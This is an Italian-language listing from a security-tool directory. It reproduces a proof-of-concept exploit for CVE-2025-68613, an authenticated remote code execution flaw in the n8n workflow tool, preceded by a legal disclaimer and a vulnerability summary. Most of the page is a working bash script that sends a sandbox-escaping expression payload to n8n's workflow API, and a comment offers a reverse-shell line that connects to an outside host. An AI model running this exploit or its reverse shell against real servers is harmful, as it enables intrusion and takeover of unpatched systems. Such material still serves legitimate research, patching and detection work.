Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso RemotoSviluppo Payload
GitHubmbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

Exploit proof-of-concept per CVE-2025-68613: Esecuzione di codice remota autenticata in n8n tramite Expression Injection

Vedi Repository
228 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

n8n Iniezione di Espressioni Autenticata RCE – CVE-2025-68613

Esecuzione Remota di Codice Critica (CVSS 9.9) nello strumento di automazione del flusso di lavoro n8n
Prova di concetto – Solo per scopi educativi e ricerca sulla sicurezza autorizzata


⚠️ Importante Avvertenza Legale

Questo codice è fornito ESCLUSIVAMENTE per scopi educativi e test di sicurezza autorizzati in ambienti di laboratorio controllati.

L'uso non autorizzato su sistemi di produzione o su qualsiasi sistema senza esplicita autorizzazione scritta è illegale e viola le leggi sull'uso improprio dei computer e sulla sicurezza informatica nella maggior parte delle giurisdizioni.

Utilizzo a proprio rischio. L'autore non è responsabile per qualsiasi uso improprio.


Informazioni sulla Vulnerabilità

CampoDettagli
Titolo Exploitn8n Esecuzione Remota di Codice tramite Iniezione di Espressioni Autenticata
CVECVE-2025-68613
Data di divulgazione2025-12-25
AutoreMohammed Idrees Banyamer
Paese dell'autoreGiordania
Contatto / SocialInstagram: @banyamer_security
GitHubmbanyamer
Fornitoren8n.io
Repository del softwaregithub.com/n8n-io/n8n
Versioni vulnerabili≥ 0.211.0 < 1.120.4
Versioni corrette1.120.4, 1.121.1, 1.122.0 e superiori
Testato sun8n 1.119.3 (Docker)
Tipo di vulnerabilitàEsecuzione Remota di Codice Autenticata tramite Fuga dalla Sandbox delle Espressioni
Punteggio CVSS9.9 (Critico)

Descrizione

Questa vulnerabilità consente a un utente autenticato di creare o modificare workflow utilizzando espressioni dannose che aggirano la sandbox delle espressioni di n8n, con conseguente esecuzione completa di comandi del sistema operativo con i privilegi del processo n8n.


Prova di Concetto – Script Exploit Bash

root@kitploit:~
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
Scarica lo strumento